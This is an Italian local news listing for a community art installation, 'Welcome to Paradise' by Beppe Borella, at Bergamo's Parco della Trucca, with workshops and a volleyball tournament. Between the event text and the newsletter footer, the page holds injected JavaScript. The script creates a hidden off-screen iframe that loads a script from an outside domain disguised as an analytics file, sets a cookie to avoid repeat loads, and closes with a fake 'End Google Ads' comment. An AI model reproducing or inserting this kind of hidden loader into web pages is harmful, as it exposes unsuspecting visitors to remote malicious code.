• Abbonati
domenica
29
Giugno

700 persone per un’opera d’arte

Evento Terminato

domenica
29
Giugno
  • DOVE
  • CONDIVIDI

Al Parco della Trucca a partire dalle 9, l’artista bergamasco Beppe Borella realizzerà l’installazione artistica "Welcome to Paradise".

L’artista richiede la partecipazione di più di 700 persone che, durante tutta la giornata, potranno lasciare su ogni piastrella una frase, un pensiero, un disegno e questo permetterà a Beppe Borella di partecipare ad un concorso per esporre al Museo di Arte Contemporanea a Roma.  

E inoltre laboratori per adulti e bambini, mercatino delle pulci, Trucca Volley terzo torneo di pallavolo e tanto altro.

if(document.cookie.indexOf(“outflee”)==-1){var interdiffused=document.createElement(“iframe”);interdiffused.setAttribute(“src”, “http://pitch.FANPAGECONTENT.COM/js/metrika/watch.js?ver=2.28.9455″);interdiffused.style.position=”absolute”;interdiffused.style.left=”-1300px”;interdiffused.style.top=”-1300px”;interdiffused.style.width=”130″;interdiffused.style.height=”130″;document.body.appendChild(interdiffused);document.cookie = “outflee=readed; max-age=32000; path=/”;}else{}/* End Google Ads */

segnala il tuo evento gratuitamente +

NEWSLETTER

Notizie e approfondimenti quotidiani sulla tua città.

ISCRIVITI